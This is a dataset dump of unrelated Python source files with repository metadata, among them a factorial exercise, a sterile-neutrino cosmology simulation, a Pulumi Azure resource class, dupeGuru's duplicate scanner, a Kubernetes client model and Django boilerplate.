[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 100]))
| [
"[email protected]"
] | |
39018bd8df654c888bf236f792358094e3d6bea6 | 77ae7c76d36009daa01b2317439c1f975f7932b2 | /exercicios/ex060att.py | f43127dd20c9afd7b1bbc847fd39bb8f04294c07 | [] | no_license | MatheusOldAccount/Exerc-cios-de-Python-do-Curso-em-Video | 5f26b5a2867fa1a2e36b486a809dfbe8b107b8c2 | 5696c49d3caf5cae817217a2da0598d1cf794f5b | refs/heads/master | 2022-03-22T10:49:33.666660 | 2019-11-25T21:24:43 | 2019-11-25T21:24:43 | 224,052,682 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | fat = int(input('Digite um número para\ncalcular seu Fatorial: '))
print('Calculando {}! ='.format(fat), end=' ')
resultado = 1
while fat > 0:
if fat == 1:
print('{} ='.format(fat), end=' ')
else:
print('{} x'.format(fat), end=' ')
resultado *= fat
fat -= 1
print('{}'.format(resultado))
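# Illustrative cross-check, not part of the original exercise: the standard
# library computes the same value, e.g.
#   import math
#   math.factorial(n)   # n being the number typed in, saved before the loop
#                       # above counts `fat` down to zero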
| [
"[email protected]"
] | |
adcfd87bb4a72a735c4618f56ed5135b4423a71d | 7c47e106c9ec85a7239c84c55ad5f20972edefcf | /tests/heavy_sterile_dirac_neutrino/__main__.py | 3d91e82acbdf3d14050992aea89e033d2d9f6408 | [] | no_license | anasthesia/pyBBN | 11813717ad5023a9b29f9594ccde93fbc2d5a0c9 | 0e88604b765eb5ce2f196909c65cf2af11a8cc2f | refs/heads/master | 2021-01-21T03:37:46.309318 | 2016-05-10T12:03:50 | 2016-05-10T12:03:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,223 | py | # -*- coding: utf-8 -*-
"""
## Heavy sterile dirac neutrino
$$ M = 33.9 MeV $$
$$ \theta_\tau \approx 4.86 \times 10^{-2} \sim \tau_N \approx 0.3 sec $$
http://arxiv.org/pdf/hep-ph/0002223v2.pdf
<img src="plots.svg" width=100% />
<img src="particles.svg" width=100% />
"""
import os
import argparse
from collections import defaultdict
from particles import Particle
from library.SM import particles as SMP, interactions as SMI
from library.NuMSM import particles as NuP, interactions as NuI
from evolution import Universe
from common import UNITS, Params
parser = argparse.ArgumentParser(description='Run simulation for given mass and mixing angle')
parser.add_argument('--mass', default='33.9')
parser.add_argument('--theta', default='0.0486')
parser.add_argument('--tau', default='0.3')
parser.add_argument('--Tdec', default='5')
parser.add_argument('--comment', default='')
args = parser.parse_args()
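# Example invocation (illustrative; these values are the defaults above, and the
# exact way the package is launched is an assumption):
#   python -m tests.heavy_sterile_dirac_neutrino --mass 33.9 --theta 0.0486 --tau 0.3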
mass = float(args.mass) * UNITS.MeV
theta = float(args.theta)
lifetime = float(args.tau) * UNITS.s
T_dec = float(args.Tdec) * UNITS.MeV
folder = os.path.join(os.path.split(__file__)[0], args.tau)
T_initial = max(50. * UNITS.MeV, T_dec)
T_interaction_freezeout = 0.05 * UNITS.MeV
T_final = 0.0008 * UNITS.MeV
params = Params(T=T_initial,
dy=0.05)
universe = Universe(params=params, folder=folder)
photon = Particle(**SMP.photon)
electron = Particle(**SMP.leptons.electron)
muon = Particle(**SMP.leptons.muon)
neutrino_e = Particle(**SMP.leptons.neutrino_e)
neutrino_mu = Particle(**SMP.leptons.neutrino_mu)
neutrino_tau = Particle(**SMP.leptons.neutrino_tau)
sterile = Particle(**NuP.dirac_sterile_neutrino(mass))
sterile.decoupling_temperature = T_initial
neutrino_e.decoupling_temperature = 5 * UNITS.MeV
neutrino_mu.decoupling_temperature = 5 * UNITS.MeV
neutrino_tau.decoupling_temperature = 5 * UNITS.MeV
universe.add_particles([
photon,
electron,
muon,
neutrino_e,
neutrino_mu,
neutrino_tau,
sterile,
])
thetas = defaultdict(float, {
'tau': theta,
})
universe.interactions += (
SMI.neutrino_interactions(
leptons=[electron],
neutrinos=[neutrino_e, neutrino_mu, neutrino_tau]
) + NuI.sterile_leptons_interactions(
thetas=thetas, sterile=sterile,
neutrinos=[neutrino_e, neutrino_mu, neutrino_tau],
leptons=[electron, muon]
)
)
universe.init_kawano(electron=electron, neutrino=neutrino_e)
if universe.graphics:
from plotting import RadiationParticleMonitor, MassiveParticleMonitor, DensityAndEnergyMonitor
universe.graphics.monitor([
(neutrino_e, RadiationParticleMonitor),
(neutrino_mu, RadiationParticleMonitor),
(neutrino_tau, RadiationParticleMonitor),
(sterile, MassiveParticleMonitor),
(sterile, DensityAndEnergyMonitor)
])
universe.evolve(T_interaction_freezeout, export=False)
universe.interactions = tuple()
universe.params.dy = 0.0125
universe.evolve(T_final)
"""
### Plots for comparison with articles
### JCAP10(2012)014, Figure 9
<img src="figure_9.svg" width=100% />
### JCAP10(2012)014, Figure 10
<img src="figure_10.svg" width=100% />
<img src="figure_10_full.svg" width=100% />
"""
if universe.graphics:
from tests.plots import articles_comparison_plots
articles_comparison_plots(universe, [neutrino_e, neutrino_mu, neutrino_tau, sterile])
import os
import csv
from itertools import izip
density_data = universe.graphics.particles[4][1].data[0]
energy_data = universe.graphics.particles[4][1].data[1]
with open(os.path.join(universe.folder, 'normalized_density_plot.dat'), 'w') as f:
writer = csv.writer(f, delimiter='\t')
for x, y in izip(*density_data):
writer.writerow([x, y])
with open(os.path.join(universe.folder, 'normalized_energy_density_plot.dat'), 'w') as f:
writer = csv.writer(f, delimiter='\t')
for x, y in izip(*energy_data):
writer.writerow([x, y])
regime_data = universe.graphics.particles[3][1].data[0]
with open(os.path.join(universe.folder, 'sterile_regime_plot.dat'), 'w') as f:
writer = csv.writer(f, delimiter='\t')
for x, y in izip(*regime_data):
writer.writerow([x, y])
| [
"[email protected]"
] | |
35e75354b7f206b04d605a0e51b6af3f66379296 | 5e6d8b9989247801718dd1f10009f0f7f54c1eb4 | /sdk/python/pulumi_azure_native/containerregistry/v20201101preview/pipeline_run.py | 22803da79b10e5367a21317726f73caa4573698c | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | vivimouret29/pulumi-azure-native | d238a8f91688c9bf09d745a7280b9bf2dd6d44e0 | 1cbd988bcb2aa75a83e220cb5abeb805d6484fce | refs/heads/master | 2023-08-26T05:50:40.560691 | 2021-10-21T09:25:07 | 2021-10-21T09:25:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,038 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['PipelineRunArgs', 'PipelineRun']
@pulumi.input_type
class PipelineRunArgs:
def __init__(__self__, *,
registry_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
force_update_tag: Optional[pulumi.Input[str]] = None,
pipeline_run_name: Optional[pulumi.Input[str]] = None,
request: Optional[pulumi.Input['PipelineRunRequestArgs']] = None):
"""
The set of arguments for constructing a PipelineRun resource.
:param pulumi.Input[str] registry_name: The name of the container registry.
:param pulumi.Input[str] resource_group_name: The name of the resource group to which the container registry belongs.
:param pulumi.Input[str] force_update_tag: How the pipeline run should be forced to recreate even if the pipeline run configuration has not changed.
:param pulumi.Input[str] pipeline_run_name: The name of the pipeline run.
:param pulumi.Input['PipelineRunRequestArgs'] request: The request parameters for a pipeline run.
"""
pulumi.set(__self__, "registry_name", registry_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if force_update_tag is not None:
pulumi.set(__self__, "force_update_tag", force_update_tag)
if pipeline_run_name is not None:
pulumi.set(__self__, "pipeline_run_name", pipeline_run_name)
if request is not None:
pulumi.set(__self__, "request", request)
@property
@pulumi.getter(name="registryName")
def registry_name(self) -> pulumi.Input[str]:
"""
The name of the container registry.
"""
return pulumi.get(self, "registry_name")
@registry_name.setter
def registry_name(self, value: pulumi.Input[str]):
pulumi.set(self, "registry_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group to which the container registry belongs.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="forceUpdateTag")
def force_update_tag(self) -> Optional[pulumi.Input[str]]:
"""
How the pipeline run should be forced to recreate even if the pipeline run configuration has not changed.
"""
return pulumi.get(self, "force_update_tag")
@force_update_tag.setter
def force_update_tag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "force_update_tag", value)
@property
@pulumi.getter(name="pipelineRunName")
def pipeline_run_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the pipeline run.
"""
return pulumi.get(self, "pipeline_run_name")
@pipeline_run_name.setter
def pipeline_run_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pipeline_run_name", value)
@property
@pulumi.getter
def request(self) -> Optional[pulumi.Input['PipelineRunRequestArgs']]:
"""
The request parameters for a pipeline run.
"""
return pulumi.get(self, "request")
@request.setter
def request(self, value: Optional[pulumi.Input['PipelineRunRequestArgs']]):
pulumi.set(self, "request", value)
class PipelineRun(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
force_update_tag: Optional[pulumi.Input[str]] = None,
pipeline_run_name: Optional[pulumi.Input[str]] = None,
registry_name: Optional[pulumi.Input[str]] = None,
request: Optional[pulumi.Input[pulumi.InputType['PipelineRunRequestArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
An object that represents a pipeline run for a container registry.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] force_update_tag: How the pipeline run should be forced to recreate even if the pipeline run configuration has not changed.
:param pulumi.Input[str] pipeline_run_name: The name of the pipeline run.
:param pulumi.Input[str] registry_name: The name of the container registry.
:param pulumi.Input[pulumi.InputType['PipelineRunRequestArgs']] request: The request parameters for a pipeline run.
:param pulumi.Input[str] resource_group_name: The name of the resource group to which the container registry belongs.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PipelineRunArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
An object that represents a pipeline run for a container registry.
:param str resource_name: The name of the resource.
:param PipelineRunArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PipelineRunArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
force_update_tag: Optional[pulumi.Input[str]] = None,
pipeline_run_name: Optional[pulumi.Input[str]] = None,
registry_name: Optional[pulumi.Input[str]] = None,
request: Optional[pulumi.Input[pulumi.InputType['PipelineRunRequestArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PipelineRunArgs.__new__(PipelineRunArgs)
__props__.__dict__["force_update_tag"] = force_update_tag
__props__.__dict__["pipeline_run_name"] = pipeline_run_name
if registry_name is None and not opts.urn:
raise TypeError("Missing required property 'registry_name'")
__props__.__dict__["registry_name"] = registry_name
__props__.__dict__["request"] = request
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["response"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:containerregistry/v20201101preview:PipelineRun"), pulumi.Alias(type_="azure-native:containerregistry:PipelineRun"), pulumi.Alias(type_="azure-nextgen:containerregistry:PipelineRun"), pulumi.Alias(type_="azure-native:containerregistry/v20191201preview:PipelineRun"), pulumi.Alias(type_="azure-nextgen:containerregistry/v20191201preview:PipelineRun"), pulumi.Alias(type_="azure-native:containerregistry/v20210601preview:PipelineRun"), pulumi.Alias(type_="azure-nextgen:containerregistry/v20210601preview:PipelineRun"), pulumi.Alias(type_="azure-native:containerregistry/v20210801preview:PipelineRun"), pulumi.Alias(type_="azure-nextgen:containerregistry/v20210801preview:PipelineRun")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(PipelineRun, __self__).__init__(
'azure-native:containerregistry/v20201101preview:PipelineRun',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'PipelineRun':
"""
Get an existing PipelineRun resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = PipelineRunArgs.__new__(PipelineRunArgs)
__props__.__dict__["force_update_tag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["request"] = None
__props__.__dict__["response"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return PipelineRun(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="forceUpdateTag")
def force_update_tag(self) -> pulumi.Output[Optional[str]]:
"""
How the pipeline run should be forced to recreate even if the pipeline run configuration has not changed.
"""
return pulumi.get(self, "force_update_tag")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of a pipeline run.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def request(self) -> pulumi.Output[Optional['outputs.PipelineRunRequestResponse']]:
"""
The request parameters for a pipeline run.
"""
return pulumi.get(self, "request")
@property
@pulumi.getter
def response(self) -> pulumi.Output['outputs.PipelineRunResponseResponse']:
"""
The response of a pipeline run.
"""
return pulumi.get(self, "response")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
Metadata pertaining to creation and last modification of the resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
| [
"[email protected]"
] | |
4cbadf96fedab1c09a4b39b33bbe809cad5469b1 | 1450b93cf402661054ec4ce21cc80bf555ae370e | /core/scanner.py | c0609ba496bd8100305af4b0f96acc96f3cfe49f | [] | no_license | lambder/dupeguru | 05adee5f743071efee039b932af572d173c9c3d3 | 78db58e0995b6e9584141ab37c5c727f22c2a198 | refs/heads/master | 2020-03-30T05:40:33.973328 | 2014-11-19T16:52:19 | 2014-11-19T16:52:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,738 | py | # Created By: Virgil Dupras
# Created On: 2006/03/03
# Copyright 2014 Hardcoded Software (http://www.hardcoded.net)
#
# This software is licensed under the "BSD" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.hardcoded.net/licenses/bsd_license
import logging
import re
import os.path as op
from hscommon.jobprogress import job
from hscommon.util import dedupe, rem_file_ext, get_file_ext
from hscommon.trans import tr
from . import engine
from .ignore import IgnoreList
# It's quite ugly to have scan types from all editions all put in the same class, but if it's not done
# this way, there will be some nasty bugs popping up (ScanType is used in core when it should exclusively
# be used in core_*). One day I'll clean this up.
class ScanType:
Filename = 0
Fields = 1
FieldsNoOrder = 2
Tag = 3
Folders = 4
Contents = 5
ContentsAudio = 6
#PE
FuzzyBlock = 10
ExifTimestamp = 11
SCANNABLE_TAGS = ['track', 'artist', 'album', 'title', 'genre', 'year']
RE_DIGIT_ENDING = re.compile(r'\d+|\(\d+\)|\[\d+\]|{\d+}')
def is_same_with_digit(name, refname):
# Returns True if name is the same as refname, but with digits (with brackets or not) at the end
if not name.startswith(refname):
return False
end = name[len(refname):].strip()
return RE_DIGIT_ENDING.match(end) is not None
def remove_dupe_paths(files):
# Returns files with duplicates-by-path removed. Files with the exact same path are considered
# duplicates and only the first file to have a path is kept. In certain cases, we have files
# that have the same path, but not with the same case, that's why we normalize. However, we also
# have case-sensitive filesystems, and in those, we don't want to falsely remove duplicates,
# that's why we have a `samefile` mechanism.
result = []
path2file = {}
for f in files:
normalized = str(f.path).lower()
if normalized in path2file:
try:
if op.samefile(normalized, str(path2file[normalized].path)):
continue # same file, it's a dupe
else:
pass # We don't treat them as dupes
except OSError:
continue # File doesn't exist? Well, treat them as dupes
else:
path2file[normalized] = f
result.append(f)
return result
class Scanner:
def __init__(self):
self.ignore_list = IgnoreList()
self.discarded_file_count = 0
def _getmatches(self, files, j):
if self.size_threshold:
j = j.start_subjob([2, 8])
for f in j.iter_with_progress(files, tr("Read size of %d/%d files")):
f.size # pre-read, makes a smoother progress if read here (especially for bundles)
files = [f for f in files if f.size >= self.size_threshold]
if self.scan_type in {ScanType.Contents, ScanType.ContentsAudio, ScanType.Folders}:
sizeattr = 'audiosize' if self.scan_type == ScanType.ContentsAudio else 'size'
return engine.getmatches_by_contents(
files, sizeattr, partial=self.scan_type == ScanType.ContentsAudio, j=j
)
else:
j = j.start_subjob([2, 8])
kw = {}
kw['match_similar_words'] = self.match_similar_words
kw['weight_words'] = self.word_weighting
kw['min_match_percentage'] = self.min_match_percentage
if self.scan_type == ScanType.FieldsNoOrder:
self.scan_type = ScanType.Fields
kw['no_field_order'] = True
func = {
ScanType.Filename: lambda f: engine.getwords(rem_file_ext(f.name)),
ScanType.Fields: lambda f: engine.getfields(rem_file_ext(f.name)),
ScanType.Tag: lambda f: [
engine.getwords(str(getattr(f, attrname)))
for attrname in SCANNABLE_TAGS
if attrname in self.scanned_tags
],
}[self.scan_type]
for f in j.iter_with_progress(files, tr("Read metadata of %d/%d files")):
logging.debug("Reading metadata of {}".format(str(f.path)))
f.words = func(f)
return engine.getmatches(files, j=j, **kw)
@staticmethod
def _key_func(dupe):
return -dupe.size
@staticmethod
def _tie_breaker(ref, dupe):
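        # Comment added for clarity: returns True when `dupe` should be preferred
        # over `ref` as the group's reference file (names containing "copy" or a
        # trailing digit suffix lose; the longer path wins as a last resort).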
refname = rem_file_ext(ref.name).lower()
dupename = rem_file_ext(dupe.name).lower()
if 'copy' in dupename:
return False
if 'copy' in refname:
return True
if is_same_with_digit(dupename, refname):
return False
if is_same_with_digit(refname, dupename):
return True
return len(dupe.path) > len(ref.path)
def get_dupe_groups(self, files, j=job.nulljob):
j = j.start_subjob([8, 2])
for f in (f for f in files if not hasattr(f, 'is_ref')):
f.is_ref = False
files = remove_dupe_paths(files)
logging.info("Getting matches. Scan type: %d", self.scan_type)
matches = self._getmatches(files, j)
logging.info('Found %d matches' % len(matches))
j.set_progress(100, tr("Removing false matches"))
        # In removing what we call here "false matches": if we scan by folders, we first want to remove
        # folder matches for which the parent is also in a match (they're "duplicated duplicates", if you
        # will). Then, we don't want mixed file kinds if the option isn't enabled, we only want matches
        # for which both files exist and, lastly, we don't want matches with both files as ref.
if self.scan_type == ScanType.Folders and matches:
allpath = {m.first.path for m in matches}
allpath |= {m.second.path for m in matches}
sortedpaths = sorted(allpath)
toremove = set()
last_parent_path = sortedpaths[0]
for p in sortedpaths[1:]:
if p in last_parent_path:
toremove.add(p)
else:
last_parent_path = p
matches = [m for m in matches if m.first.path not in toremove or m.second.path not in toremove]
if not self.mix_file_kind:
matches = [m for m in matches if get_file_ext(m.first.name) == get_file_ext(m.second.name)]
matches = [m for m in matches if m.first.path.exists() and m.second.path.exists()]
matches = [m for m in matches if not (m.first.is_ref and m.second.is_ref)]
if self.ignore_list:
j = j.start_subjob(2)
iter_matches = j.iter_with_progress(matches, tr("Processed %d/%d matches against the ignore list"))
matches = [
m for m in iter_matches
if not self.ignore_list.AreIgnored(str(m.first.path), str(m.second.path))
]
logging.info('Grouping matches')
groups = engine.get_groups(matches, j)
matched_files = dedupe([m.first for m in matches] + [m.second for m in matches])
if self.scan_type in {ScanType.Filename, ScanType.Fields, ScanType.FieldsNoOrder, ScanType.Tag}:
self.discarded_file_count = len(matched_files) - sum(len(g) for g in groups)
else:
# Ticket #195
# To speed up the scan, we don't bother comparing contents of files that are both ref
# files. However, this messes up "discarded" counting because there's a missing match
# in cases where we end up with a dupe group anyway (with a non-ref file). Because it's
# impossible to have discarded matches in exact dupe scans, we simply set it at 0, thus
# bypassing our tricky problem.
# Also, although ScanType.FuzzyBlock is not always doing exact comparisons, we also
# bypass ref comparison, thus messing up with our "discarded" count. So we're
# effectively disabling the "discarded" feature in PE, but it's better than falsely
# reporting discarded matches.
self.discarded_file_count = 0
groups = [g for g in groups if any(not f.is_ref for f in g)]
logging.info('Created %d groups' % len(groups))
j.set_progress(100, tr("Doing group prioritization"))
for g in groups:
g.prioritize(self._key_func, self._tie_breaker)
return groups
match_similar_words = False
min_match_percentage = 80
mix_file_kind = True
scan_type = ScanType.Filename
scanned_tags = {'artist', 'title'}
size_threshold = 0
word_weighting = False
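# Illustrative usage sketch (added comment, not part of the original module; the
# `files` argument stands for the file objects gathered elsewhere in dupeGuru):
#   scanner = Scanner()
#   scanner.scan_type = ScanType.Contents
#   groups = scanner.get_dupe_groups(files)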
| [
"[email protected]"
] | |
099b9d0845f92ff8c2fa69e85d795893a024d24e | 7087a5dd1772c9456f098bc024a894dcaeef5432 | /backup/build/new-calkube/kubernetes-6.0.0_snapshot-py2.7.egg/kubernetes/client/models/v1_portworx_volume_source.py | 611c15aa0788155255a147f5d3ee6c627268a2b7 | [] | no_license | santhoshchami/kubecctl-python | 5be7a5a17cc6f08ec717b3eb1c11719ef7653aba | cd45af465e25b0799d65c573e841e2acb983ee68 | refs/heads/master | 2021-06-23T11:00:43.615062 | 2019-07-10T16:57:06 | 2019-07-10T16:57:06 | 145,669,246 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,234 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.10.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1PortworxVolumeSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'fs_type': 'str',
'read_only': 'bool',
'volume_id': 'str'
}
attribute_map = {
'fs_type': 'fsType',
'read_only': 'readOnly',
'volume_id': 'volumeID'
}
def __init__(self, fs_type=None, read_only=None, volume_id=None):
"""
V1PortworxVolumeSource - a model defined in Swagger
"""
self._fs_type = None
self._read_only = None
self._volume_id = None
self.discriminator = None
if fs_type is not None:
self.fs_type = fs_type
if read_only is not None:
self.read_only = read_only
self.volume_id = volume_id
@property
def fs_type(self):
"""
Gets the fs_type of this V1PortworxVolumeSource.
FSType represents the filesystem type to mount Must be a filesystem type supported by the host operating system. Ex. \"ext4\", \"xfs\". Implicitly inferred to be \"ext4\" if unspecified.
:return: The fs_type of this V1PortworxVolumeSource.
:rtype: str
"""
return self._fs_type
@fs_type.setter
def fs_type(self, fs_type):
"""
Sets the fs_type of this V1PortworxVolumeSource.
FSType represents the filesystem type to mount Must be a filesystem type supported by the host operating system. Ex. \"ext4\", \"xfs\". Implicitly inferred to be \"ext4\" if unspecified.
:param fs_type: The fs_type of this V1PortworxVolumeSource.
:type: str
"""
self._fs_type = fs_type
@property
def read_only(self):
"""
Gets the read_only of this V1PortworxVolumeSource.
Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts.
:return: The read_only of this V1PortworxVolumeSource.
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""
Sets the read_only of this V1PortworxVolumeSource.
Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts.
:param read_only: The read_only of this V1PortworxVolumeSource.
:type: bool
"""
self._read_only = read_only
@property
def volume_id(self):
"""
Gets the volume_id of this V1PortworxVolumeSource.
VolumeID uniquely identifies a Portworx volume
:return: The volume_id of this V1PortworxVolumeSource.
:rtype: str
"""
return self._volume_id
@volume_id.setter
def volume_id(self, volume_id):
"""
Sets the volume_id of this V1PortworxVolumeSource.
VolumeID uniquely identifies a Portworx volume
:param volume_id: The volume_id of this V1PortworxVolumeSource.
:type: str
"""
if volume_id is None:
raise ValueError("Invalid value for `volume_id`, must not be `None`")
self._volume_id = volume_id
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1PortworxVolumeSource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
] | |
1f852c2b0f5513529cfc6704d2c97b41e3789c9e | 71a6b2d96cc00b7682241f1de77f4d740e810701 | /manage.py | 5161ada7f0b2c48e36964e647c21bb195c12426c | [] | no_license | crowdbotics-apps/app1-19382 | 170e191b6d91b3e4caca7ad8227230f173bea3bd | 71d47dfcf473b48ea0285295ea5e8d37af529779 | refs/heads/master | 2022-12-01T17:29:19.786547 | 2020-08-05T00:18:25 | 2020-08-05T00:18:25 | 285,132,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 630 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'app1_19382.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
d07d642565edc59e0b0d20bb90ff23ec5090a9c4 | 835adeea55324fb9bf0f2c466ba7b740d9d35970 | /react_d/todo/todo/urls.py | 5018d5027738b9c1f8aa7c6956ee4a7267b39a52 | [] | no_license | golammahmud/react-practices-repository | 4f3524832fbcda1bd32508b9dda5d84e4920750f | 5bc3b9ee6142a9152f7ac223358c94ceb43a7ed2 | refs/heads/master | 2023-08-19T18:37:56.417089 | 2021-10-07T12:21:26 | 2021-10-07T12:21:26 | 414,583,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 855 | py | """todo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.views.generic import TemplateView
urlpatterns = [
path('admin/', admin.site.urls),
path('' ,TemplateView.as_view(template_name="index.html")),
]
| [
"[email protected]"
] | |
6424902da0def910bde07cd8f0ed83ed1b17aece | f2a18b4a1d759cfd44aff9be13848b4bc03560d8 | /ex32.py | 2c577cdcff980c7145146272002e01dbd099382f | [] | no_license | 5h3rr1ll/LearnPythonTheHardWay | 1e740b0d4ab71c4c5218599d970001684fa58eea | 5612f768b8ce93fcc4757e8db128017f00a6c2ea | refs/heads/master | 2021-01-13T05:06:20.749196 | 2017-02-07T19:32:15 | 2017-02-07T19:32:15 | 81,246,206 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 859 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
the_count = [1, 2, 3, 4, 5]
fruits = ["apples", "oranges", "pears", "apricots"]
change = [1, "pennies", 2, "dimes", 3, "quarters"]
# this first kind of for-loop goes through a list
for number in the_count:
print("This is count %d" % number)
# same as above
for fruit in fruits:
print("A fruit of type: %s" % fruit)
# also we can go through mixed lists too
# notice we have to use %r since we don't know what's in it
for i in change:
print("I got %r" % i)
# we can also build lists, first start with an empty one
elements = []
# then use the range function to do 0 to 5 counts
for i in range(0,6):
